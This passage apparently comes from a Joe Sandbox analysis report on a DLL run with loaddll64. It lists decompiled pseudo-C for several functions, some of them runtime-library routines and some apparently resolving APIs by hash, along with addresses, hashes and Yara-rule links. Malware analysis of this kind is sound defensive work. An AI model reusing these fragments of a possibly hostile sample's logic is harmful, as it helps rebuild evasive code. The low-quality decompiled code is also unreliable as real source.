				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x130f6431;
				if (__edx >= 0) goto 0x130f6431;
				E00007FFC7FFC130F6BDC(_t27, _t52);
				_t28 = _t27 & 0xfffffff7;
				goto 0x130f6488;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x130f644c;
				asm("dec eax");
				if (_t43 >= 0) goto 0x130f644c;
				E00007FFC7FFC130F6BDC(_t28, _t52);
				_t29 = _t28 & 0xfffffffb;
				goto 0x130f6488;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x130f6468;
				asm("dec eax");
				if (_t44 >= 0) goto 0x130f6468;
				E00007FFC7FFC130F6BDC(_t29, _t52);
				_t30 = _t29 & 0xfffffffe;
				goto 0x130f6488;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x130f6488;
				asm("dec eax");
				if (_t45 >= 0) goto 0x130f6488;
				if ((dil & 0x00000010) == 0) goto 0x130f6485;
				E00007FFC7FFC130F6BDC(_t30, _t52);
				_t31 = _t30 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x130f64a2;
				asm("dec eax");
				if (_t47 >= 0) goto 0x130f64a2;
				E00007FFC7FFC130F6BDC(_t31, _t52);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                0x7ffc130f6400
                                0x7ffc130f6405
                                0x7ffc130f6414
                                0x7ffc130f641c
                                0x7ffc130f6420
                                0x7ffc130f6427
                                0x7ffc130f642c
                                0x7ffc130f642f
                                0x7ffc130f6436
                                0x7ffc130f6439
                                0x7ffc130f643b
                                0x7ffc130f6440
                                0x7ffc130f6442
                                0x7ffc130f6447
                                0x7ffc130f644a
                                0x7ffc130f644c
                                0x7ffc130f6450
                                0x7ffc130f6452
                                0x7ffc130f6457
                                0x7ffc130f645e
                                0x7ffc130f6463
                                0x7ffc130f6466
                                0x7ffc130f6468
                                0x7ffc130f646c
                                0x7ffc130f646e
                                0x7ffc130f6473
                                0x7ffc130f6479
                                0x7ffc130f6480
                                0x7ffc130f6485
                                0x7ffc130f6488
                                0x7ffc130f648c
                                0x7ffc130f648e
                                0x7ffc130f6493
                                0x7ffc130f649a
                                0x7ffc130f64b8

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _set_statfp
                                • String ID:
                                • API String ID: 1156100317-0
                                • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction ID: 964fa575040371325d65a34880e014d11f59a0afc52581298c705295d34a18fa
                                • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction Fuzzy Hash: 8F11C426E18E3F0BF6542134DF4637911D96F453BCE080AB4E96E27AD6CE2D7461D231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4898 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 16%
                                			E00007FFC7FFC130F4898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				int _t33;
				long _t37;
				void* _t38;
				signed int _t39;
				int _t48;
				signed long long _t60;
				short* _t65;
				signed int* _t66;
				void* _t82;
				void* _t89;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t102;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFC7FFC130F7050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
				_t60 =  *0x13123760; // 0x8abfd9f97faf
				_a5176 = _t60 ^ _t89 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t102 = _t101 + __r8;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] =  *((intOrPtr*)(0x13124970 + (__edx >> 6) * 8));
				if (__r8 - _t102 >= 0) goto 0x130f49db;
				_t65 =  &_a40;
				if (__r8 - _t102 >= 0) goto 0x130f4943;
				_t39 =  *__r8 & 0x0000ffff;
				if (_t39 != 0xa) goto 0x130f492f;
				 *_t65 = 0xd;
				_t66 = _t65 + 2;
				 *_t66 = _t39;
				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x130f4911;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				_t48 = _t33;
				if (_t33 == 0) goto 0x130f49d3;
				if (_t33 == 0) goto 0x130f49c3;
				_v8 = _v8 & 0x00000000;
				r8d = _t48;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f49d3;
				if (0 + _a24 - _t48 < 0) goto 0x130f4990;
				__rcx[1] = __edi - r15d;
				goto 0x130f4906;
				_t37 = GetLastError();
				 *__rcx = _t37;
				E00007FFC7FFC130F6D80();
				return _t37;
			}



















                                0x7ffc130f4898
                                0x7ffc130f489d
                                0x7ffc130f48af
                                0x7ffc130f48b7
                                0x7ffc130f48c1
                                0x7ffc130f48d2
                                0x7ffc130f48e0
                                0x7ffc130f48e4
                                0x7ffc130f48fc
                                0x7ffc130f48ff
                                0x7ffc130f4906
                                0x7ffc130f490c
                                0x7ffc130f4914
                                0x7ffc130f4916
                                0x7ffc130f4921
                                0x7ffc130f4928
                                0x7ffc130f492b
                                0x7ffc130f492f
                                0x7ffc130f4941
                                0x7ffc130f4943
                                0x7ffc130f494e
                                0x7ffc130f495c
                                0x7ffc130f496f
                                0x7ffc130f4974
                                0x7ffc130f497e
                                0x7ffc130f4984
                                0x7ffc130f4988
                                0x7ffc130f498e
                                0x7ffc130f4990
                                0x7ffc130f49a5
                                0x7ffc130f49ae
                                0x7ffc130f49b9
                                0x7ffc130f49c1
                                0x7ffc130f49c8
                                0x7ffc130f49ce
                                0x7ffc130f49d3
                                0x7ffc130f49d9
                                0x7ffc130f49e9
                                0x7ffc130f4a09

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: U
                                • API String ID: 2456169464-4171548499
                                • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction ID: c6116eb31599becb4ad0f909fe8d585fdfe02209de7472e901fd323701e8414b
                                • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction Fuzzy Hash: E941F622B1CA5982EB20CF25E8043BA77A4FB887A8F414031EE8DA7788DF3CD511C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640CA238 Relevance: 6.4, APIs: 5, Instructions: 127memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 19%
                                			E00000201201640CA238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
				char _v72;
				char _v80;
				char _v88;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t41;
				void* _t43;
				long long* _t82;
				long long _t83;
				long long _t84;
				intOrPtr _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t112;
				void* _t115;
				long long* _t118;
				void* _t130;
				long _t133;
				void* _t134;
				long _t136;
				void* _t139;

				_t84 = __rbx;
				_t82 = _t118;
				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x18)) = __r8;
				_t3 = _t82 + 0x20; // 0xfb849fa7
				_t134 = __rcx;
				E00000201201640C24B0(__rbx, _t3, _t112);
				if (_t82 == 0) goto 0x640ca3dc;
				E00000201201640C908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t82 == 0) goto 0x640ca29f;
				_v88 =  *_t82();
				goto 0x640ca2a5;
				_v88 = 0;
				_t10 = _t82 + 1; // 0x1
				r8d = _t109 + _t10;
				HeapAlloc(_t139, _t136, _t133);
				_v80 = _t82;
				if (_t82 == 0) goto 0x640ca3ce;
				0x640c47b0();
				_t13 = _t109 + 1; // 0x1
				r8d = _t13;
				0x640c47b0();
				E00000201201640C908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t82 == 0) goto 0x640ca30d;
				 *_t82();
				goto 0x640ca30f;
				_t16 =  &_a32; // 0xfb84a007
				_t17 =  &_v72; // 0xfb849f9f
				r8d = 0;
				_v104 = _t16;
				_t41 = E00000201201640C7CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0x640cd458 + 8)), _t17, _t130, _t109);
				HeapFree(??, ??, ??);
				if (_t41 != 0) goto 0x640ca3ce;
				r8d = _a32;
				_t108 = _v72;
				_t21 =  &_v88; // 0xfb849f8f
				_t83 = _t21;
				_t22 =  &_v80; // 0xfb849f87
				_v104 = _t83;
				_t43 = E00000201201640C52B8(_t84, _t108, _t82,  *((intOrPtr*)( *0x640cd458 + 8)), _t22, _t112, _t115);
				_t110 = _v80;
				if (_v88 == 0) goto 0x640ca389;
				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0x640ca389;
				if (_t134 - 1 != 0) goto 0x640ca37a;
				 *((char*)(_t83 + _t110)) = 0;
				if (_t43 != 0) goto 0x640ca3b0;
				E00000201201640C7500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0x640cd458 + 8)));
				if (_t83 != 0) goto 0x640ca3a5;
				_t29 = _t83 + 8; // 0x8
				goto 0x640ca3b0;
				 *_a24 = _t83;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t29;
			}


























                                0x201640ca238
                                0x201640ca238
                                0x201640ca23b
                                0x201640ca23f
                                0x201640ca25c
                                0x201640ca265
                                0x201640ca26d
                                0x201640ca278
                                0x201640ca288
                                0x201640ca290
                                0x201640ca299
                                0x201640ca29d
                                0x201640ca2a1
                                0x201640ca2b1
                                0x201640ca2b1
                                0x201640ca2b6
                                0x201640ca2bf
                                0x201640ca2c7
                                0x201640ca2dd
                                0x201640ca2e2
                                0x201640ca2e2
                                0x201640ca2ed
                                0x201640ca2fc
                                0x201640ca304
                                0x201640ca309
                                0x201640ca30b
                                0x201640ca30f
                                0x201640ca317
                                0x201640ca31c
                                0x201640ca31f
                                0x201640ca32a
                                0x201640ca339
                                0x201640ca341
                                0x201640ca347
                                0x201640ca34f
                                0x201640ca354
                                0x201640ca354
                                0x201640ca359
                                0x201640ca361
                                0x201640ca366
                                0x201640ca36f
                                0x201640ca378
                                0x201640ca381
                                0x201640ca387
                                0x201640ca38b
                                0x201640ca391
                                0x201640ca396
                                0x201640ca39e
                                0x201640ca3a0
                                0x201640ca3a3
                                0x201640ca3ad
                                0x201640ca3b8
                                0x201640ca3c8
                                0x201640ca3d6
                                0x201640ca3f5

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: 88865e83111980dff0510f088ed9f7e1209d0e105b784afecbfde7a3da43b2c0
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: B141D0313047A0CBEB54DB56A85979A63A9FBC9BC4F144025BF4E4374AEF39C4158B48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C2DC4 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E00000201201640C2DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v88;
				void* _v96;
				void* _v104;
				long long _v112;
				signed int _v120;
				long long _v128;
				long long _v136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t72;
				signed int _t80;
				void* _t81;
				void* _t97;
				signed int _t98;
				void* _t99;
				void* _t114;
				long long* _t139;
				signed long long _t140;
				long long* _t142;
				void* _t143;
				void* _t169;
				void* _t170;
				void* _t172;
				signed int _t173;
				long _t177;
				void* _t179;
				void* _t190;
				void* _t191;
				void* _t192;
				signed int* _t193;
				long long _t194;
				void* _t200;
				long _t202;
				void* _t205;

				_t191 = _t179;
				 *((long long*)(_t191 + 0x18)) = __r8;
				 *((long long*)(_t191 + 0x10)) = __rdx;
				_t203 =  *0x640cd458;
				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
				_t170 = __rcx;
				_v120 =  *0x640cd450;
				r15d = 0;
				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
				_v112 =  *((intOrPtr*)( *0x640cd458 + 8));
				if (E00000201201640C4320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0x640c2e29;
				_t12 = _t205 + 1; // 0x1
				r12d = _t12;
				_v104 = _t172;
				goto 0x640c2e34;
				_t173 = _v104;
				r12d = 2;
				_t15 =  &_a32; // 0xca
				if (E00000201201640C4880(r12d, _t114,  *((intOrPtr*)( *0x640cd458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0x640c2f94;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t193 = _v96;
				if (_t173 == 0) goto 0x640c2e8d;
				_t72 = _a8;
				_t193[0xa] = 1;
				_t193[0x12] = _t173;
				_t193[0xd] = _t72;
				_t193[0x10] = _t72;
				_t25 = _t170 + 0xc0; // 0xc0
				r9d = 0;
				 *_t193 = _v120 ^ 0x62ade362;
				_t193[3] =  *(_t170 + 0x48);
				_t193[2] =  *(_t170 + 0x4c);
				_t30 =  &_a8; // 0xb2
				_v128 = _t30;
				_t32 =  &_v120; // 0x32
				_v136 = _t32;
				_t97 = E00000201201640C1BFC(_t32, _t143, _t25, _t193);
				HeapFree(_t205, _t202, _t200);
				if (r13d == 0) goto 0x640c2f01;
				if (_t97 == 0) goto 0x640c2ef6;
				if (_t97 != 0x10d2) goto 0x640c2f01;
				E00000201201640CA3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
				if (_t97 != 0) goto 0x640c2f94;
				_t98 = _a8;
				_t194 = _v120;
				r13d =  *(_t170 + 0x4c);
				_t80 = E00000201201640C6C1C(_t98, _t194);
				_t38 =  &_a8; // 0xb2
				r9d = 1;
				 *(_t170 + 0x48) = _t98;
				 *(_t170 + 0x4c) = _t80;
				_t81 = E00000201201640C7B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
				_t99 = _t81;
				if (_t81 != 0) goto 0x640c2f71;
				_t139 = _a16;
				 *_t139 = _t194;
				 *_a24 = _a8;
				if ( *(_t170 + 0x4c) != r13d) goto 0x640c2fcd;
				goto 0x640c2fc7;
				HeapFree(_t172, _t177, _t143);
				_t47 = _t170 + 0xc0; // 0xc0
				E00000201201640C47B8(_t99, _t139, _t143, _t47, _t177);
				goto 0x640c2faf;
				if (_t99 == 0x10d2) goto 0x640c2fc2;
				_t48 = _t170 + 0xc0; // 0xc0
				if (E00000201201640C47B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0x640c2fcd;
				asm("lock or dword [edi+0xec], 0x1");
				goto 0x640c2fcd;
				r15d = 1;
				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0x640c302f;
				E00000201201640C908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t139 == 0) goto 0x640c2fed;
				 *_t139();
				if (r15d == 0) goto 0x640c301c;
				_t140 =  *((intOrPtr*)(_t170 + 0x58));
				if (_v88 - _t140 <= 0) goto 0x640c301c;
				_t57 = _t170 + 0xc0; // 0xc1
				if (E00000201201640C47B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0x640c301c;
				asm("lock or dword [edi+0xec], 0x1");
				_t142 = _t140 * 0x23c34600 + _v88;
				 *((long long*)(_t170 + 0x58)) = _t142;
				if (_v104 == 0) goto 0x640c308e;
				HeapFree(??, ??, ??);
				if (_t99 == 0) goto 0x640c304e;
				if (_t99 != 0x10d2) goto 0x640c308e;
				E00000201201640C908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t142 == 0) goto 0x640c3067;
				 *_t142();
				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
				E00000201201640C908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
				if (_t142 == 0) goto 0x640c308e;
				 *_t142();
				return _t99;
			}







































                                0x201640c2dc4
                                0x201640c2dc7
                                0x201640c2dcb
                                0x201640c2ddf
                                0x201640c2de6
                                0x201640c2deb
                                0x201640c2dfc
                                0x201640c2e04
                                0x201640c2e07
                                0x201640c2e0e
                                0x201640c2e1a
                                0x201640c2e1e
                                0x201640c2e1e
                                0x201640c2e22
                                0x201640c2e27
                                0x201640c2e29
                                0x201640c2e2e
                                0x201640c2e34
                                0x201640c2e50
                                0x201640c2e56
                                0x201640c2e5e
                                0x201640c2e61
                                0x201640c2e64
                                0x201640c2e6c
                                0x201640c2e6e
                                0x201640c2e75
                                0x201640c2e7e
                                0x201640c2e83
                                0x201640c2e88
                                0x201640c2e91
                                0x201640c2e98
                                0x201640c2ea3
                                0x201640c2eaa
                                0x201640c2eb2
                                0x201640c2eb7
                                0x201640c2ebf
                                0x201640c2ec4
                                0x201640c2ec9
                                0x201640c2edd
                                0x201640c2edf
                                0x201640c2ee8
                                0x201640c2eec
                                0x201640c2ef4
                                0x201640c2efc
                                0x201640c2f03
                                0x201640c2f09
                                0x201640c2f10
                                0x201640c2f15
                                0x201640c2f1e
                                0x201640c2f23
                                0x201640c2f2b
                                0x201640c2f37
                                0x201640c2f3a
                                0x201640c2f3d
                                0x201640c2f42
                                0x201640c2f46
                                0x201640c2f48
                                0x201640c2f58
                                0x201640c2f67
                                0x201640c2f6d
                                0x201640c2f6f
                                0x201640c2f7e
                                0x201640c2f84
                                0x201640c2f8d
                                0x201640c2f92
                                0x201640c2f9a
                                0x201640c2f9c
                                0x201640c2fb1
                                0x201640c2fb3
                                0x201640c2fc0
                                0x201640c2fc7
                                0x201640c2fd1
                                0x201640c2fdc
                                0x201640c2fe4
                                0x201640c2feb
                                0x201640c2ff0
                                0x201640c2ff2
                                0x201640c2ffb
                                0x201640c2ffd
                                0x201640c300d
                                0x201640c300f
                                0x201640c3026
                                0x201640c302b
                                0x201640c3032
                                0x201640c303c
                                0x201640c3044
                                0x201640c304c
                                0x201640c3057
                                0x201640c305f
                                0x201640c3065
                                0x201640c3067
                                0x201640c306e
                                0x201640c307e
                                0x201640c3086
                                0x201640c308c
                                0x201640c30a0

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: bc0662030675e0f4f8cfa9e1ddb000a9ee75fa6338ef3475cffa78a58856b3fd
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: 5681A0326007A0D7EB24DB12E849BDE73A8F788784F504029FF4947B8ADB3AD465CB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F20A8 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130F20A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
				void* _t43;
				signed int _t52;
				void* _t53;
				void* _t61;
				signed int _t64;
				signed char _t66;
				signed char _t75;
				signed int _t76;
				void* _t100;
				signed int _t109;

				_t75 = __edx;
				_a8 = __rbx;
				_a24 = __rbp;
				 *__rcx = 0;
				r14d = r9d;
				_t76 = __edx;
				if (__eflags == 0) goto 0x130f211a;
				if (__eflags == 0) goto 0x130f20f9;
				if ((__edx & 0x00000003) - 1 == 1) goto 0x130f20f2;
				_t43 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t43);
				goto 0x130f211f;
				goto 0x130f211f;
				asm("sbb eax, eax");
				goto 0x130f211f;
				__rcx[1] = 0x80000000;
				_t52 = _t76 & 0x00000700;
				if ((_t75 & 0x00000008) == 0) goto 0x130f218b;
				if (_t52 == 0x100) goto 0x130f2184;
				if (_t52 == 0x200) goto 0x130f217d;
				if (_t52 == 0x300) goto 0x130f2176;
				if (_t52 == 0x400) goto 0x130f218b;
				if (_t52 == 0x500) goto 0x130f216f;
				if (_t52 == 0x600) goto 0x130f217d;
				_t100 = _t52 - 0x700;
				if (_t100 == 0) goto 0x130f216f;
				_t53 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t53);
				goto 0x130f2190;
				goto 0x130f2190;
				goto 0x130f2190;
				goto 0x130f2190;
				goto 0x130f2190;
				__rcx[2] = 3;
				if (_t100 == 0) goto 0x130f21e2;
				if (_t100 == 0) goto 0x130f21db;
				if (_t100 == 0) goto 0x130f21d4;
				if (_t100 == 0) goto 0x130f21cd;
				if (_t100 == 0) goto 0x130f21be;
				_t61 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t61);
				goto 0x130f21e4;
				sil = __rcx[1] == 0x80000000;
				goto 0x130f21e4;
				goto 0x130f21e4;
				goto 0x130f21e4;
				goto 0x130f21e4;
				__rcx[5] = __rcx[5] & 0x00000000;
				bpl = 0x80;
				__rcx[3] = 0;
				__rcx[4] = 0x80;
				if ((bpl & dil) == 0) goto 0x130f21fd;
				 *__rcx =  *__rcx | 0x00000010;
				if ((0x00008000 & _t76) != 0) goto 0x130f2225;
				if ((_t76 & 0x00074000) != 0) goto 0x130f2222;
				if (E00007FFC7FFC130F4DDC(_t75, __rax,  &_a16) != 0) goto 0x130f229b;
				if (_a16 == 0x8000) goto 0x130f2225;
				 *__rcx =  *__rcx | bpl;
				if ((0x00000100 & _t76) == 0) goto 0x130f2245;
				_t64 =  *0x13124dd4; // 0x0
				_t66 =  !_t64 & r14d;
				if ((bpl & _t66) != 0) goto 0x130f2245;
				__rcx[4] = 1;
				_t109 = dil & 0x00000040;
				if (_t109 == 0) goto 0x130f2259;
				asm("bts dword [ebx+0x14], 0x1a");
				asm("bts dword [ebx+0x4], 0x10");
				__rcx[3] = __rcx[3] | 0x00000004;
				asm("bt edi, 0xc");
				if (_t109 >= 0) goto 0x130f2262;
				__rcx[4] = __rcx[4] | 0x00000100;
				asm("bt edi, 0xd");
				if (_t109 >= 0) goto 0x130f226d;
				asm("bts dword [ebx+0x14], 0x19");
				if ((dil & 0x00000020) == 0) goto 0x130f227a;
				asm("bts dword [ebx+0x14], 0x1b");
				goto 0x130f2285;
				if ((dil & 0x00000010) == 0) goto 0x130f2285;
				asm("bts dword [ebx+0x14], 0x1c");
				return _t66;
			}













                                0x7ffc130f20a8
                                0x7ffc130f20a8
                                0x7ffc130f20ad
                                0x7ffc130f20bd
                                0x7ffc130f20c2
                                0x7ffc130f20c8
                                0x7ffc130f20d2
                                0x7ffc130f20d7
                                0x7ffc130f20dc
                                0x7ffc130f20de
                                0x7ffc130f20e3
                                0x7ffc130f20e9
                                0x7ffc130f20f0
                                0x7ffc130f20f7
                                0x7ffc130f210c
                                0x7ffc130f2118
                                0x7ffc130f211f
                                0x7ffc130f2129
                                0x7ffc130f212b
                                0x7ffc130f2132
                                0x7ffc130f2139
                                0x7ffc130f2140
                                0x7ffc130f2147
                                0x7ffc130f214e
                                0x7ffc130f2155
                                0x7ffc130f2157
                                0x7ffc130f2159
                                0x7ffc130f215b
                                0x7ffc130f2160
                                0x7ffc130f2166
                                0x7ffc130f216d
                                0x7ffc130f2174
                                0x7ffc130f217b
                                0x7ffc130f2182
                                0x7ffc130f2189
                                0x7ffc130f2190
                                0x7ffc130f2196
                                0x7ffc130f219b
                                0x7ffc130f21a0
                                0x7ffc130f21a5
                                0x7ffc130f21aa
                                0x7ffc130f21ac
                                0x7ffc130f21b1
                                0x7ffc130f21b7
                                0x7ffc130f21bc
                                0x7ffc130f21c7
                                0x7ffc130f21cb
                                0x7ffc130f21d2
                                0x7ffc130f21d9
                                0x7ffc130f21e0
                                0x7ffc130f21e4
                                0x7ffc130f21e8
                                0x7ffc130f21eb
                                0x7ffc130f21ee
                                0x7ffc130f21f8
                                0x7ffc130f21fa
                                0x7ffc130f2204
                                0x7ffc130f220c
                                0x7ffc130f221a
                                0x7ffc130f2220
                                0x7ffc130f2222
                                0x7ffc130f222c
                                0x7ffc130f222e
                                0x7ffc130f2236
                                0x7ffc130f223c
                                0x7ffc130f223e
                                0x7ffc130f2245
                                0x7ffc130f2249
                                0x7ffc130f224b
                                0x7ffc130f2250
                                0x7ffc130f2255
                                0x7ffc130f2259
                                0x7ffc130f225d
                                0x7ffc130f225f
                                0x7ffc130f2262
                                0x7ffc130f2266
                                0x7ffc130f2268
                                0x7ffc130f2271
                                0x7ffc130f2273
                                0x7ffc130f2278
                                0x7ffc130f227e
                                0x7ffc130f2280
                                0x7ffc130f229a

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                • String ID:
                                • API String ID: 72036449-0
                                • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction ID: a29df5b4091cd437e0b99f029867bc5ddfa8e1a5fa130d5ab96c2e0768c50546
                                • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction Fuzzy Hash: 6551A12AE0CE2F43F7A9692C8E0137A66DCBB50738F194475DB0D661D6CA2CE860C665
                                Uniqueness

